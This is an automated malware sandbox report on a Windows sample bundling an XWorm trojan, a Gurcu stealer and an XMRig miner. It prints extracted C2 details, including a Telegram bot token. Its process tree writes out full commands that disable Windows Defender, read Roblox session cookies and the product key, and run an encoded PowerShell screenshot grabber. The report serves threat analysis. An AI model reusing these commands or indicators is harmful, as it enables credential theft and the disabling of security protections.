Analysis
-
max time kernel
72s -
max time network
78s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
-
submitted
11-07-2024 11:46
General
-
Target
obfuscation.exe
-
Size
9.1MB
-
MD5
2ae868b168beb1deb65d20f874bce159
-
SHA1
9a46809b44bcef9991434e8e15e3c1f2457e99bb
-
SHA256
7e6af40b57f5bbcd748800a280c4d246b4a57b364b02fa17a912408e717f047e
-
SHA512
8c883e738c2ea0db42d66c55f6edd50bd9b894d8ebd856669e99284f380c14bf99d748f52ca9cc7583ee55f06432a27c2fa54c500a7c688e10ab9516d2181bef
-
SSDEEP
196608:nMhkTeaA1HeT39IigQWc0/aHeM1F9m0gJ2u:MqTw1+TtIiLm/Y29
Malware Config
Extracted
xworm
logo-active.gl.at.ply.gg:25835
0x9d2c646775BAa45D051289fE9b2c1AacD26A43A0:1
-
Install_directory
%LocalAppData%
-
install_file
msedge.exe
-
telegram
https://api.telegram.org/bot6763574008:AAHEXR4ypdI308urgV3J-jyMocsw7X8318Q
Extracted
gurcu
https://api.telegram.org/bot6763574008:AAHEXR4ypdI308urgV3J-jyMocsw7X8318Q/sendMessage?chat_id=tgratbot
Signatures
-
Detect Xworm Payload 1 IoCs
-
Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
-
Xworm
Xworm is a remote access trojan written in C#.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 7 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs
Using powershell.exe command.
-
Creates new service(s) 2 TTPs
-
Stops running service(s) 4 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 7 IoCs
-
Loads dropped DLL 35 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
UPX packed file 54 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Modifies data under HKEY_USERS 46 IoCs
-
Modifies registry class 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\obfuscation.exe"C:\Users\Admin\AppData\Local\Temp\obfuscation.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\obfuscation.exe"C:\Users\Admin\AppData\Local\Temp\obfuscation.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\a2bkR1GR1\Built.exeC:\Users\Admin\AppData\Local\Temp\a2bkR1GR1\Built.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\a2bkR1GR1\Built.exeC:\Users\Admin\AppData\Local\Temp\a2bkR1GR1\Built.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a2bkR1GR1\Built.exe'"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a2bkR1GR1\Built.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 26⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 26⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌    .scr'"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌    .scr'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"5⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName6⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard6⤵
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"5⤵
-
C:\Windows\system32\netsh.exenetsh wlan show profile6⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"5⤵
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\o544o0ai\o544o0ai.cmdline"7⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESED00.tmp" "c:\Users\Admin\AppData\Local\Temp\o544o0ai\CSCEB4DE2C293E64AE793AE5C1826FACBCF.TMP"8⤵
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"5⤵
-
C:\Windows\system32\getmac.exegetmac6⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI32802\rar.exe a -r -hp"0" "C:\Users\Admin\AppData\Local\Temp\WcO9E.zip" *"5⤵
-
C:\Users\Admin\AppData\Local\Temp\_MEI32802\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI32802\rar.exe a -r -hp"0" "C:\Users\Admin\AppData\Local\Temp\WcO9E.zip" *6⤵
- Executes dropped EXE
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"5⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption6⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"5⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory6⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER6⤵
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault6⤵
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a2bkR1GR1\miner.exeC:\Users\Admin\AppData\Local\Temp\a2bkR1GR1\miner.exe3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵
-
